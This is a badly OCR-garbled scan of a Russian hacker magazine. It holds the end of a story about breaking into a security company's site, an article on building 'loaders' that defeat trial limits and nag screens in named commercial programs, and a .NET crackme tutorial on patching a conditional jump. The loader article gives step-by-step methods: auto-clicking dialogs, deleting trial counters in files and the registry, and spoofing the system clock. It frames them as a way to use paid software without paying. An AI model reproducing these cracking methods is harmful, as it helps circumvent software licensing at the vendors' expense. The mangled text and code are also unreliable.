Липсііопз заканчивается печально. Ну зачем, зачем вам пос- 
ледняя версия РНР, если вы не используете ее багфиксы??? 
Как итог на этот раз — всего лишь слегка подмоченная репутация. 

Н НАРРѴЕЫР! 

гпіг^егѴМіе: 

Настало время мне объясниться. 

Почему я не сделал бэкконект? Не брал рута? Не протроянил 
дистрибутивы? Не проифреймил индекс, в конце концов, 
а просто закрыл браузер после получения шелла? Может, 
потому что аптайм у сервера достигал 300? Или потому, что 
Адпііит — достойная российская компания? 

Нет. Прежде всего, потому что админ такой же человек, каки 
я. К его чести, он все-таки позаботился о защите и разграни- 
чении прав. В процессе ни один байт данных не был повреж- 
ден. Мы не вандалы :). БОБ на сайте в РЬогит я пропатчил 
(на всякий пожарный) и после отписал в службу поддержки о 
найденных уязвимостях. 

тІ5*егВ1аск: 

Итог взлома показывает, что даже те, кто защищает нас от сете- 
вых атак и беретза это деньги, зачастую не могут достойно защи- 
тить самих себя. Так что, господа, спастись от атак вам поможет 
только собственные паранойя, внимательность и аккуратность. 

В общем, берите пример со своего же файрвола! :) ЗС 



> ѵѵагпіпд 

Внимание! Инфор- 
мация представлена 
исключительно с 
целью ознакомле- 
ния! Ни автор, ни 
редакция за твои 
действия ответст- 
венности не несут! 




> СІѴЙ 

Файлы и программы, 
упоминаемые в ста- 
тье, ищи на нашем 
диске. 
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СЕРГЕЙ «_А1!ЗІЧ» АЛЯЕВ 



УНИВЕРСАЛЬНЫЕ ПРИЕМЫ БЫВАЛОГО КРЭКЕРА 



«Извините, но срок работы программы истек, 
пожалуйста, нажмите Выход, либо зарегист- 
рируйте программу», «Вы исчерпали макси- 
мальное количество запусков»... Бьюсь об 
заклад, тебе много раз приходилось видеть 
подобные сообщения. Сейчас я расскажу, как 
раз и навсегда от них избавиться, не отдавая 
за софт ни копейки и даже не обладая глубо- 
кими познаниями в крэкинге. 



мануалах по крэкингутехнология взлома с помощью простей- 
ших л оадеров типа «РіпбѴѴіпсІоѵѵ-ЗепсІМеззаде», как правило, 
упоминается только вскользь. Тем не менее, ее использование 
весьма эффективно. Главная отличительная особенность 
— необязательность глубокого знания крэкерского ремесла. Домашнюю 
крэк-лабораторию может организовать даже школьник. Рассмотрим это 
дело более подробно. 

В Л0АДЕРТИПА«РШШѴШ00Ж-5ЕЫ0МЕ55АСЕ» 

Начнем с самого простого — падзсгееп, он же НАГ. Яркий пример — Тоіаі 
Соттапбег. Стоит л ишь запустить программу, как мы видим раздражаю- 
щее окно стремя кнопками. 

Чтобы избавиться от НАГА, нужно нажать соответствующую кнопку — этим 
сложным действием товарищи разработчики, видимо, пытаются проверить 
наш интеллект. Попытаемся смоделировать ту часть мозга, которая будет 
решать эту сложную задачу. Разложим задачу на действия : 

1. Запустим прогу 
2 . Дождемся появления НАГА 



3 . Прочтем номер нужной кнопки 

4 . Нажмем нужную кнопку 

Теперь предстоит провернуть все в программном режиме — переведем 
прогу с русского на С или А5М, само собой с применением ѴѴіп32 АРІ. Я 
буду использовать свой блестящий ѴівиаІЗіибіо, нуаты можешь любимый 
ОеІрЬі-ВиіІбег. 

Чтобы запустить прогу, нам нужна функция ШпЕхес (использовать очень 
красивую функцию СгеаІеРгосезз не будем, чтобы не грузить голову 
заумными параметрами]. Вот ее прототип: 

ІІШГ МіпЕхес ( 

ЬРСЗТ ІрСтсіЬіпе , // имя ехе файла, можно с параметрами 
ТЛШ 1 иСтсІЗТю™ / / состояние окна после запуска программы 
) ; 

Со вторым пунктом проблем быть не должно (используем цикл или 
Зіеер () ). Авоттретий пункт интересен. Для начала нужно найти строку с 
номером нужной кнопки — для этого нам пригодятся следующие функции: 




► 0б2 
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Оідаіо 2000 — просто хорошая программа, работающая 1 5 дней 





МЧЙ4р-2 



л 

МаІбМадіс РегзопаІЗ.6. Вотон, счетчик запусков 



збабіс СИпй* РАЗСАЬ РіпбМіпбом ( 

ЬРСТЗТК ІрзгСІаззЫаше, // класс окна 

ЬРСТЗТК ІрзШіпбоѵ/Ыате // заголовок окна 

) ; 

збаЬіс Шпб* ЕіпбМіпбсжЕх ( 

НШІБ ШпбРагепЬ , // описатель родительского окна 

НШБ ШпбСЬіІбАбСег , // описатель дочернего окна 
ЬРСТЗТК ІрзгСІазз, // класс окна 

ЬРСТЗТК ІрзШіпбсж // заголовок окна 

Все они возвращаютописатель найденного окна. РіпсІМіпсІоѵг мы будем 
использовать для поиска главного окна, а ЕіпсШіпйстЕх — для поиска 
дочерних окон, то есть контролов (ВибСол, Есііѣ, Ьізі, Рапеі и т.д и т.п.). 
Чтобы найти строку, нужно знать, где искать и что искать. Программа 
изѴізиаІЭіибіоТооІз — 5ру++ — нам в этом поможет. Запускаем Тоіаі 
Соттапбег и 5ру++. 

Находим нужное окно в списке, в нашем случае Шпсіом 000305СВ 
«Тоіаі соттапбег» ТЫАЗТУЫАОЗСРЕЕЫ, где: 

000305СВ — описатель окна (нас не интересует) , 

«Тобаі соттапбег» — заголовок окна, 

ТМАЗТУЫАСЗСКЕЕЫ - класс окна 

Развернем эту иерархию и приятноудивимся, увидев, как автор Тоіаі 
Соттапбег или кто-то там еще упростил нам задачу. Я говорю о строчке 
Міпд.оѵ7 00010630 «1» ТРапеІ. 

Для получения номера нужной кнопки достаточно прочесть заголовок этого 
контрола. Читать будем функцией СеШілборѵТехС. 

іпб СеШіпбоѵ/ТехЬ 
( 

НШГО Шпб, // описатель окна 

ЬРТЗТК ІрЗЬгіпд, // буфер 

іпб пМахСоипЬ / / количество считанных символов 

) ; 

Алгоритм разбора иерархии окон и получения строки с заголовком искомой 
кнопки будеттаким. При помощи ЕіпбШпсІоы получаем описатель окна с 
классом ТЫАЗТУЫАОЗСРЕЕЫ] далее с помощью ЕіпбМіпбоъѵЕх полу- 



чаем описатель окна с заголовком «ТЫоѣеЪоок», потом с заголовком 
«ЫадРаде»] следующим идет описатель окна с классом ТРапеІ и, нако- 
нец, хэндл окна с классом ТРапеІ (является дочерним предыдущему окну). 
Ну и последний этап: так как все контролы в окне — тоже окна дочерние и 
принадлежат другому классу, то, соответственно, им также можно послать 
сообщение, например, ВМ_СЬТС^для окна класса Викіоп (означает 
«программно нажать нужную кнопку»). Посылать сообщение будем функ- 
цией ЗепбМеззаде с сообщением ВМ_СЫСК. Перед этим найдем НАЫВЬЕ 
нужной кнопки. 

ЬКЕЗЬЬТ ЗепбМеззаде ( 

НШБ Шпб, 

// описатель окна, которому посылаем сообщение 
ТЛШ? Мзд, // сообщение 

Ѵ/РАКАМ мРагат, 

// параметры сообщения (для каждого свои) 

БРАКАМ ІРагагп // параметры сообщения (для каждого свои) 

) ; 

Осталось закинуть лоадер в папку сТоІаГом и создать для него ярлык.У по- 
лучившегося лоадера есть небольшой недостаток — если быстро запустить 
его два раза, то одна копия процесса зависнет. Поэтому я поставил в начало 
кода строки: 

Шпб = : : ЕіпбМпбоѵ/ ( "ТТОТАЬ_СМБ" , ШЬЬ) ; 
іб ( ! Шпб) 

Сделано это, чтобы лоадер запускался только в случае отсутствия главного 
окна ТоІаГа (а значит, две копии ТоІаГа лоадером не запустить). В общем, 
программу есть куда улучшать. Например, можно сделать так, чтобы код 
отрабатывался только после появления НАГА. Это можно осуществить при 
помощи Ноок, нотогда придется писать 0І_І_ или воспользоваться пере- 
хватом АРІ-функций. Другими словами, все это усложнитлоадер и уведет 
от главной цели — крякнуть программу всего за 1 5-20 минут. Согласись, что 
приятноустанавливать себе свежую версию ѴѴіпбоѵѵз-ТоІіаІ Соттапбега 
сразуже после появления новой версии, пока все твои друзья усилено ждут 
и ищутлекарство. 

Не могу не упомянуть о хорошей альтернативе 5ру++ — ѴѴіпбоѵѵБсаппегот 
ІпдЭоИ В ней есть множество удобных фич, например, подсветка вы- 
бранного окна-контрола (позволит не ошибиться при выборе контрола 
для посылки сообщения). Тутже, не выходя из программы, можно послать 
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ЧЕЛ МоИсніім 



■ : " взлом 



Что там у тебя внутри? 



Тічічвппи-оі ГСТРМкГОгішй зійаіт* чвіі'іощйий» аЛмпиіс^у? 



Цд 1 м*т 

ЙейесШгхочетв Іпіегпеі 



конкретному окну конкретное сообщение. Тулзой оченьудобно проверять 
подопытные программы на «наш клиент или не наш». 

г ЛОАДЕР ТИПА «0ЕІТКІАІ.С01ЖТЕК-РІІ.Е» 

Но это еще не все, на что способны подобные лоадеры. Поразмыслив, 
можно предусмотреть та кую вещь, как удаление триального счетчика. 
Рассмотрим пример, когда программа хранитсчетчик в файле (тему поиска 
Ігіаі-счетчиков рассматривать не будем, она уже освещалась на страни- 
цах журнала). В качестве примера возьмем редактор формул МаіЬМадіс 
РегзопаІЗ.6, который отказывается работать после 30 запусков. 

Это «математическое волшебство» создает фаппМаѣЪМадіс Регзопаі 
3 . 6.ІЫІ в директории ѴѴіпсІоѵѵз, в котором и считает количество запусков, 
а также создает дублирующий файлтзпазес. (311 в \ЗузЬет32. 

Долго не разбираясь, решаем просто при каждом запуске программы 
удалять фа йлы-счетчики. 

Стратегия нападения такова: 

1. Удаляем счетчик (файл(ы)); 

2. Запустим прогу; 

3. Дождемся появления НАГА; 

4. Найдем нужную кнопку; 

5. Нажмем кнопку. 

Пунктномер 1 заключается вудалении или переписывании определенных 
файлов в МіпсЗстз и Зузѣ ет директориях. Для их нахождения есть соот- 
ветствующие АРІ-функции. 

1Л№Г СебЗузбетБігесбогу ( 

ЬРТЗТК ІрВиГГег, //в этот буфер будет записан путь 

к системному каталогу 
1Л№Г иЗізе, // размер буфера 

) ; 

ІЛЫТ СеШіпскжзБігесбогу ( 

ЬРТЗТК ІрВиГГег, //в этот буфер будет записан путь 

к ѵ7ІпсІоѵ73 каталогу 

ІЛЫТ иЗізе, // размер буфера 

) ; 



Апункт4 выполняем по шаблону ТоІаІСоттапсІега :). 

В ЛОАДЕР ТИПА «ОЕІТШАІСОІШТЕК-КЕб» 

Триальные счетчики редко хранятся в файлах. Хитрые шаровар- 
щики ныкают их в системный реестр. Однако это не особо услож- 



нит нам лоадер и жизнь, потому что у нас в запасе есть золотые 
функции: 



ЬОЫО ВедОрепКеуЕх ( 
НКЕУ ЬКеу , 

ЬРСТЗТК ІрЗиЬКеу , 
подключа 
БЖЖБ иІОрбіопз, 
КЕСЗАМ затБезі-гесІ 
РНКЕУ рЬкКезиІб, 

) ; 



// указатель на строку с именем 

// зарезервирован = 0 
// режим доступа 
// хэндл открытого ключа 



Функция открывает нужный ключ в реестре. Так, ЪКеу — одно из следующих 
значений: НКЕУ_СЬАЗЗЕЗ_К00Т, НКЕУ_ С11ККЕЫТ_ ЦЗЕР, НКЕУ_ЬОСАЬ_ 
МАСНІЫЕ, НКЕ У_ ЦЗЕР 3 . 



ЬОЫС ЕедБеІебеКеу ( 

НКЕУ ЬКеу , / / то же , что в функции КедОрепКеуЕх 

ЬРСТЗТК ІрЗиЬКеу / / то же, что в функции КедОрепКеуЕх 
) ; 

Функция удаляет соответствующий ключ. 

Стоит отметить, что функция РедБеІеЬеКеу довольно неудобна, так как 
неумеетудалять рекурсивно. Поэтому имеетсмысл обратить внимание на 
функцию ЗНБеІеѣеКеу, у которой те же параметры. 

Всем будущим повелителям лоадеров скажу, что удалять и изменять 
ключи (значения) из реестра на своем рабочем компе нужно крайне 
осторожно. Иначе можно остаться не только без лоадеров, но и без 
ѴѴіпсІоѵѵз :). 

Проверять работулоадера будем с помощьютулзы Оідаіо 2000 Риззіап, яв- 
ляющейся движком для озвучивания текстовых файлов на русском языке. 
Дело втом, что Оідаіо спроектирован как Ігіаі- проект. Этим мы сейчас и 
воспользуемся. 

После установки Оідаіо в системной директории ѴѴіпсІоѵѵз волшебным обра- 
зом появляется фа й л Бі да ІоРедізЬег . ехе, который Оідаіо загружает при 
каждом запуске. Этот файл отвечаетза регистрацию программы и управление 
триальным счетчиком. Одновременно он является лучшим кандидатом на 
замену нашим лоадером, который будет работать по следующим инструкциям : 

1. Проверяем, есть ли искомый ключ в реестре 

2. Если есть — удаляем счетчик (ключ в реестре) 



► 064 
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ѴѴіпсІоѵѵЗсаппег во всей 
красе 



Именно там, в реестре, Оідаіо хранит свои тайны. Собственно, 
перечисленных пунктов достаточно. Оідііо 2000 сам будет 
запускать наш лодер, сам будетудалять свои счетчики (не без 
нашей помощи) — в общем, будет делать все, чтобы программа 
продолжала работать. 

В ЛОАДЕР ТИПА «5ЕТЮСАІ.ТІМЕ» 

Этоттип лоадера позволяетзаменитьлоадеры второго и 
третьего типа, то есть пропустить авантюрно-захватывающее 
приключение под названием «найди, где я спрятал Ігіаі-счет- 
чик». Всего-то нужно вспомнить о замечательной 
АРІ-функции: 

ВООЬ ЗеДЬосаІТіше ( 
сопвб ЗУЗТЕМТІМЕ* ІрЗузбешТіше 
) ; 

Функция уста на вливает зада иное в структуре ЗУЗТЕМТІМЕ 
время. Структура ЗУЗТЕМТІМЕ до вольно большая, поэтому ее 
описаниеты найдешь в исходнике кстатье. Смысл использо- 
вания лоадера втом, что, какправило, подопытная программа 
при запуске получаеттекущую дату и сравнивает ее с датой 
установки. Эта разница и есть интересующий программу 
срок. Следовательно, наша задача — скармливать программе 
одну и ту же дату. Примером будет замечательная программа 
декомпилятор для .ЫЕТ сборок — Рейесіог, которая является 
Егееѵѵаге, но, тем не менее, через пару месяцев начинает 
кидать фразы «із оиЬ оі с?а Ре» или «с?о уои і ѵалР Ро 
ирдаіе аиіотаѣісаііу?». Клиент наш, будем лечить. Ле- 
чение будет заключаться в процедурах, которые мы воплотим 
в лоадере: 

1 . Запомним текущую дату 

2 . Установим нужное для КебІесРог'а время 

3 . Сделаем паузу в пару секунд (чтоб КебІесРог 
успел запросить фальшивую дату) 

4 . Запускаем прогу 

5. Возвращаем правильное время, предваритель- 
но откорректировав его с учетом паузы 

В качестве фальшивой даты сойдет дата создания файла 
Ееііесѣог . ехе. 



В ЛОАДЕР ТИПА «СОМ ВО» 

Ну и наконец, рассмотрим этакийтри в одном вариант — лоа- 
дер, который совмещает в себе несколько лоадеров. Его мы 
будем писать для продвинутой утилиты создания скриншотов 
и их редактирования — НурегЭпар 6. 

После небольшого обследования выяснилось, что защита 
сего творения ныкает счетчик в реестр. Если быть более 
точным, то счетчиков несколько и нычектоже. Также мы имеем 
окнотипа НАГ, паразитирующее на наших нервах. Но это еще 
не все: утилита периодически создает файл с 1: гі а I- меткой во 
временной директории ѴѴіпсІоѵѵз. Поэтому заучим еще одну 
удобную функцию: 

ШОИЭ СебТешрРаЫі ( 

БЖЖБ пВиббегЬепдРЪ., // размер буфера обычно 
МАХ_РАТН 

ЬРТЗТК ІрВиббег // буфер, в котором запишется 
путь 
) ? 

Функция дает нам путь к временной директории ѴѴіпсІоѵѵз. 
Защита НурегЭпар по полной мусорит на нашем компьютере 
— придется за ней убирать. Дабы не портить собственные 
нервы, поручим это лоадеру, который будет смесью лоадера 
первого, второго и третьего типов. Составим план нападения: 

1. Удаляем ключи в реестре 

2 . Удаляем файл-метку 

3 . Запускаем программу 

4 . Дожидаемся НАГА 

5 . Находим нужную кнопку 

6 . Активируем кнопку 
7 . Нажимаем на кнопку 

На скриншотах показаны места хранения Ігіаі-меток (на твоей 
машине они могут оказаться другими). Конечно, они страшно 
зашифрованы-закриптованы-засекречены. Та кая таинствен- 
ность нам ни к чему... поэтому мы просто ихудалим :). 

В сценарии нам незнаком только пунктб. Его реализация 
проста, ведь, чтобы активировать кнопку, нужно послать ей 
сообщение Ш_АСТІѴАТЕс помощью уже известной функции 
ЗепбМеззаде. Ну вот, только что мы заставили работать 




> ѵісіео 

На ОѴй ищи ви- 
деоурок, в котором 
показаны основные 
аспекты взлома 
триальных программ. 




> ѵѵагпіпд 

Внимание! Инфор- 
мация представлена 
исключительно с 
целью ознакомления! 
Ни автор, ни редакция 
за твои действия 
ответственности не 
несет! 




На диске ищи все 
упомянутые в статье 
программы для кря- 
керского мастерства 
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Тоіаі безобразничает 



Той! Соштапгіег 
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оіаі Соттагкіег ѵегзіоп 7.0рЬЗ 

С 0 |іуі іуіа ■; 1993-2007 І*у С1иі$&ш 6 ін$И - АН НіуІЛ5 

ІЪіз ргодгат і$ ЗІіагамшэ, і.ѳ.уои саг іезі ііііз ІиНуІш&опеІ йето 
ѵег&і ог» Но г опе топйі АЙег йгів ігіаЗ регіосІ уои ш$\іе діаіег ог гіеі віе 
№іе ргодгэт іют уош ІгагсІ сіізк. Ѵіэи ппау аізо Нгееіу гесІізігіЬиІе іНііз 
ргодгшг РІеззе ргез$ ВвдІ5*іа((іоп ігГо Іог Іигіігег іпіогтвііоп. 

ТЫ а йіаіод Ьохадіі поі арреаі іо (Не гедізіегвй ѵегеіоп. 



Ргоцшп ііііоішлгіші 


Кеуізіиіііаи іпіо 




Р1ео$е Ьіілоп №. 1 


(0 1І№ 



программу, защищенную серьезным протектором Агтасіііо, без ВоШСЕ, без 
ОІІуОЬд, без ЮА — практически голыми руками. 

^ ЗАКЛЮЧЕНИЕ 

Подобными дырами в защите страдают даже серьезные и известные 
программы. Например, очень давно на одном знакомом мне компьютере 
лоадер успешно загружал Зй МАХ, прекрасно справлялся с Ыего б.хх, пока 
доблестные немцы не прикрыли лавочку в 7х версиях. 

Статья не претендует на роль«Библии лоадеров», она лишь знакомите 
основами лоадеростроения, показывает, откуда начать. Чтобы продолжить, 
нужны манускрипты Рихтера, Фень Юань’я, ну и, конечно, Криса Каспер- 
ского. Их песни по мо гут «улучшить и углубить» код. 

М5РЫ. сгаскІаЬ.ги . ѵѵазт.ги не упоминаю. Это само собой разумеющиеся 
ресурсы. 

В статье рассмотрены далеко не все способы борьбы с вба геѵѵаге- подоб- 
ными лоадерами, а лишьсамые простые и распространенные. В действи- 



тельности их столько, сколько есть способов хранить Іхіаі-счетчики. 
Применение лоадеров не ограничивается сугубо деструктивными мо- 
ментами — их можно использовать и в мирных целях. К примеру, перед 
запуском какой-либо программы — для подготовки данных (отсортировать, 
отобрать нужные, отредактировать). Или, скажем, тебе приходится рабо- 
тать одновременно с несколькими программами. Можно написать лоадер, 
который будет их запускать, меняя позицию окон и размер так, кактебе 
удобно. Кстати, можно создать этакий «суперлоадер», который будетуправ- 
лять всеми лоадерами натвоей машине, таксказать, менеджер лоадеров. 

В общем, есть о чем подумать и где развернуться. 

Полные листинги лоадеров с комментариями, конечноже, прилагаются 
к статье. Код лоадеров максимально упрощен, понять его несложно, ибо 
написаны они на С и АззетЫегІлоадеры модно писать на АБМ’е, нуа мы с 
тобой, безусловно, модные перцы). Последний лоадер специально напи- 
сан на ѴВ.ЫЕТ, чтобы показать, что грозой шарова рщиков может стать даже 
школьница-старшеклассница сознаниемтакого мирного языка. т 




«Нагадил в реестре НурегБпар» — раз 




«Нагадил в реестре НурегБпар» — два 
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Победоносное шествие .МЕТ-платформы по миру продолжается, а вменяе- 
мых руководств по взлому что-то не видно. Сегодня я расскажу, как дизас- 
семблировать Ѵізиаі Вазіс/С# сборки, патчить в Ьіеѵѵ’е и вести отладку на 
уровне байт-кода. Сейчас мы заправим мозговые баки свежей порцией авиа- 



ционного керосина, выведем двигатели на взлетный режим и дадим хоро- 



ший старт, написав свой собственный сгаскте и тут же взломав его всеми 



доступными средствами. 



ехнология .ЫЕТ готовится праздновать свой юбилей. За 
минувшее время было написано множество коммерческих 
программ (и малвари втом числе), но кактолько дело доходит 
до того, чтобы заглянуть внутрь р-кода на предмет«отломать» 
пару ненужных байт, выясняется, что достойных хакерских инструментов 
нет. И, судя по всему, не появится. Поэтому приходится использовать, что 
есть, хакерствуя в весьма стесненных обстоятельствах, словно шахтеры в 
забое! 

Н ЧТО НАМ ПОНАДОБИТСЯ 

Итак, сейчас я перечислю хакерский арсенал, который поможет нам в 
нелегком ремесле. 

1 . ѴізиаІБіисііо 2008 Ехргезз. Последняя версия знаменитой «студии» от 
МБ, распространяющаяся бесплатно и включающая в себя все необходи- 
мое для полноценной работы: трансляторы Ѵізиаі Вазіс, С#, а также новый 
компилятор Си++, способныйтранслировать Си++ программы в байт-код. 
На ѴѴ2 К уста на вливаться категорически отказалась, а на Бегѵег2003 встала 
с полпинка (ой-ііпе Іпз1:аизанимает894 Мбайтв .ізо-формате): ЬНрѴ/ѵѵѵѵм. 
тісгозой.сот/ехргезз/боѵѵпіоасі/ . 

2. Мопо 2.0 Веіа ЬгѴѴіпсіоѵѵз. Альтернативная реализация .ЫЕТ от 
компании ІЧоѵеІІ, поддерживающая различные версии Ыпих и ѴѴіпсІоѵѵз, 
нормально встала на ѴѴ2К, но потребовала МБ Ргатеѵѵогк. Крометого, 
комплект поставки неполный (в частности, нет дизассемблера), а откомпи- 
лированные сборки жутко тормозят, зато дистрибутив занимает 71 Мбайт: 
ЬйрѴ/щуѵѵѵ.ао-топо.сот/топо-сІоѵѵпІоасіз/сіоѵѵпІоасІ.ЫтІ . 

3. Біапсіагсі ЕСМА-335/Соттоп І_апдиаде ІпИазІгисІиге (СІ_І)/41Ь есііііоп 
Ыипе 2006). Полная версия европейского стандарта, описывающая архи- 
тектуру виртуальной машины, байт-код, структуру ассемблерных сборок, в 



общем, солидный 556-страничный документ из серии «мастхэв» (на анг- 
лийском языке, в формате рей): ѵѵѵѵѵѵ.еста-іпІіегпайопаІ.огд/риЫісайопз/ 
зІапсІагсІз/Еста-ЗЗб.Ыт . А вот прямая ссылка: ѵуѵѵ\/ѵ.еста-іпІегпаІіопа1.. 
огд/риЬІісабопз/ііІез/ЕСМА-БТ/Еста-ЗЗб.рсІР 

4. СИ. Іпзігисііоп БеЕ Краткий справочникоп-кодов с«С# ОпІіпе.ЫЕТ Ргее 
епсусіоресііа» — жутко неполный, но удобный и без воды (на английском 
язы ке): ЬйрѴ/еп.сзЬагр-опІіпе.пеі/СІЕ ІпзІхисЕоп БеЕ 

5. Введение в М5ІІ_. Цикл статей от Кенни Керр в переводе Ариііа (одного из 
основателей ѴѴА5М). Представляет собой подробное описание архитектуры 
виртуальной машины и концепций языка С#, рекомендуемое кпрочте- 
нию всем начинающим хакерам (на русском языке): ѵѵѵѵѵѵ.ѵѵазт.ги/зегіез. 
рбр?5Ісі=22 . 

6. Соттоп Іпіегтесііаіе 1_апдиаде. Поверхностное описание СП-языка 
(общего для всех языков платформы .ЫЕТ) на ѴѴікіребіа со ссылками на кучу 
полезных ресурсов (на английском языке): ІйрУ/еп.ѵѵікіребіа.огд/ѵѵікі/ 
Соттоп I пЕегппесІіа1:е Еапдиаае . 

7 , 8 , 9 , 10 ... Прочие примочки и описания. Полный листингищи на нашем 

оѵо. 

В ПИШЕМ СВОЙ ПЕРВЫЙ СКАСКМЕ 

Глубоководное погружение в байт-код .ЫЕТ-программ начинается! 
Пристегиваем ремни, проверяем, всели на месте, и запускаем МісгозоЙ 
Ѵізиаі Зіисііо или РАН + Соіогег. Работать в ЮЕ, конечно, удобнее (особенно 
начинающим, ведь среда автоматически отображает список методов для 
каждого класса — не надо постоянно лазить в справочники), однако это 
порочный путь, абстрагирующий нас от машины. Мы — хакеры старого 
поколения — предпочитаем консольныетекстовые редакторы с подсветкой 
синтаксиса или даже без таковой. 
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Текстнашего первого сгаскте, написанного на С#, в простейшем случае 
выглядит так. Это консольная программа, вручную набранная втекстовом 
редакторе. ЮЕ пихаетсюда много лишнего, затрудняющего понимание, но 
на скомпилированном коде это никак не отражается. 

Исходный текст программы п2к_сгаскте_01 И.сз 

// использовать классы основной системной библиотеки 
ив іпд Зузбеш; 

сіазв пегиші 

// имя класса — произвольно и может быть любым 

{ 

збабіс ѵоі Маіп ( ) 

{ 

// объявляем переменную з типа строка 
збгіпд з; 



// запрашиваем у пользователя пароль 
Зузбеш.СопзоІе .№гібе ( "епбег раззѵтогсі: " ) ; 
з = Зузбеш.СопзоІе .КеабЬіпе ( ) ; 

іі: (з == "пезиші" ) { 

// сравниваем введенный пароль с эталонным 
Зузбеш.СопзоІе .МгібеЬіпе ( "Ііеііо, шазбег ! " ) ; 

} 

еізе { 

Зузбеш.СопзоІе .^гібеЬіпе ( " биск уои, Ьаскег ! " ) ; 

} 

} 

} 

В среде ЮЕ сборка .ЫЕТ-программ осуществляется клавишей <Р6>, а из 
командой строки (при этом сзс. ехе должен находиться в путях, чего не 
происходит при установке по умолчанию): 

$ сзс. ехе п2к_сгаскше_01Ь.. сз 



В Мопо вместо сзс . ехе используется файл тсз/тсз .Ъаі, но, незави- 
симо от способа сборки, мы получаем п2к_сгаскте_01Ь . ехе, готовый 
кзапуску. После чего нас спросят пароль и, если мы введем его неверно 
— пошлют. 

Компиляция осуществляется путем указания ключа /СЬЯ в командной 
строке компилятора СЬ.ЕХЕІ рядом с которым можно указать ключ /Ох для 
форсирования максимальной оптимизации): 



Ш ЮіЧІГНСѴ.'И' Р * 

0ЛКРНС\С*>п2к .сгасктоЛШі . еке 
#і 1 1 рак к йог* I : ] ?34 56 

І1РІ 1 П \ ЙГ 11 



РЛКРИСЧШ. 
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Хакнутая программа любой пароль воспринимает какправильны 





$с1.ехе /сіг Ьеііо-сіг . срр 

Полученный файл Ьеііо-сіг . ехе представляетсобой смесьуправляе- 
мого байт-кода с большим количеством вызовов неуправляемого машин- 
ного кода из различных библиотек — плюс он тянетза собой ПТІ_, написан- 
ную на байт-коде. Это позволяет сочетать высокую скорость выполнения с 
управляемостью и безопасностью. Впрочем, «чистые» С# сборки все-таки 
выигрывают как в размерах, так и в скорости. Чуть позже ты убедишься в 
этом самостоятельно, а пока же поверь мне на слово. 

^ ПЕРВЫЕ ЭКСПЕРИМЕНТЫ 

Загружаем подопытный п2к_сгаскте_011і. ехе в НІЕѴѴ, дважды давим 
<ЕЫТЕР> для перевода редактора в дизассемблерный режим, жмем <Р5> 
и попадаем в точку входа, где красуется команда /лгр _СогЕхеМаіп ; 
тзсогее .311. Это весь машинный код, какой только есть. 

Дальнейшее расследование показывает, что]тр находится в самом конце 
секции .Іехі, за которой располагаются секции ресурсов и перемещаемых 
элементов, а выше — байт-код виртуальной машины. Просматривая его 
в Ьех-тобе, мы обнаружим все текстовые строки (и пароль втом числе!) в 
формате ІІпісобе, причем, перед строкой находится байт, определяющий 
длину строки. Узнав оригинальный пароль мы, конечно, без труда смогли бы 
«взломать» сгаскте — однако редкая программа хранитпароли открытым 
текстом, да и неинтересно это. 

Лучше загрузим в НІЕѴѴ другой исполняемый файл, написанный на Си++ — 
Ъеііо-сіг . ехе. Он также вызывает СогЕхеМаіп. В отличие от«чистой» 
.МЕТ сборки, написанной на С#, здесь присутствует большое количество 
«переходников» к машинному коду — функциям зігстр, деііз.ргіпѣ^, 
напрямую вызываемым из библиотеки МЗѴСЯ90 .ЕЬЬ. За это отвечает ме- 
ханизм Р/Іпѵоке, позволяющий создавать «гибридные» программы, часть 
из которых транслируется в машинный код, а часть — в интерпретируемый 
байт-код, что серьезно затрудняет взлом. Не волнуйся, когда мы возьмемся 
за дело, никакой Р/Іпѵоке нас не остановит! А пока загрузим .ЫЕТ-сборку в 
нормальный дизассемблер. 

^ ТЕХНИКАДИЗАССЕМБЛИРОВАНИЯ 

Загружаем п2к_сгаскте_ 01 Ь. ехе в ЮАРго и видим, что ничего ужас- 
ного в СЮ- коде нет. Напоминает байт-код виртуальной ^ѵа-машины. ЮА 
Рго нетолько создает перекрестные ссылки, но и показываетопкоды, и 
расставляет комментарии к командам, избавляя от необходимости каждый 
раз заглядывать в справочник (ЕСМА-335/РагШіоп ІІІ/СЮ Іпзігисбоп 5еі). 
Чтобы дизассемблер был дружелюбнее кхакеру, необходимо выпол- 
нить следующие действия. В меню «Орбопз» выбрать пункт «Техі 
гергезеп1:абоп». Там указать количество байт для отображения опкода 
[«ЫитЬег о? орсойе Ьуѣез») — шести вполне хватит. В разделе «І_іпе 
ргеЛхез» нужно сбросить все галочки, кроме «Рипсбоп оііъеіз», после 
чего вновь возвратиться в меню «Орііопз», зайти в «Соттепіз» и 
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Ооіпеі ІІ_ Есійог — ІЬ-отладчикс 0111-интерфейсом 



взвести «Бізріау аиіо соттепіз» для автоматического отображения 
комментариев ко всем инструкциям (впрочем, при наличии некоторого 
опыта работы с СІІ_-кодом этого можно и не делать). 

Поклонники графической версии ЮА Рго могут задействовать графы, упро- 
щающие (на самом деле — усложняющие) понимание структуры програм- 
мы. Тутуж, как говорится, на вкуси цвет все фломастеры разные. Лично я 
никогда не пользовался графами и другим не советую. 

Атеперь посмотрим, на что способен штатный дизассемблер от МісговоЙ, 
поумолчанию расположенный в каталогеС: \ШЫБ0Ѵ73\МісгозоЪЪ . 

ЫЕТ \ Егатеѵюгк \ ѵ2 . 0 . 50727 \. Зовется он ііазш. ехе. Загружаем в 
него п2к_сгаскте_01Ъ . ехе. 

Хм, в общем-то, довольно неплохая картина получилась, а навигация по 
классам выполнена даже лучше, чем в ЮА Рго, причем намного лучше (при- 
мечание: чтобы ИсЗазт. ехе отображал опкоды инструкций, необходимо 
в меню Ѵіеѵѵ взвести галочку «ЗЪом Ьуііез»}. 

Самое время исследовать дизассемблерный текст нашей программы. Тут 
все ясно без травы и даже без комментариев (особеннотем, кто знаком с 
виртуальными машинами со стековой организацией). Если опустить де- 
тали, получается следующее: программа вызывает Зузіет. Сопзоіе: : 
Мгііе ( "епіег раззыогсі" ) , после чего считывает строку в пере- 
менную Ѵ_0 и вызывает функцию Зузіет. ЗЬгіпд : : Ериаіііу (Ѵ_0 , 
"пегиті ") для проверки строк на соответствие. В случае их несовпаде- 
ния на экран выводится строка «Писк оіі, Ъаскег! », управление на 
которую передается машинной командой Ьгѣгие. з ІЬ_0031 (с опкодом 

2 БЪ ОБЪ.}. Получившуюся выкладку ищи на диске. 

Чтобы заставить программу воспринимать все пароли как правильные, 
двухбайтовый условный переходЪгСгие. з ІЬ_0031 необходимо 
заменить на пару однобайтовых команд пор (опкод — ООЪ, а вовсе не 
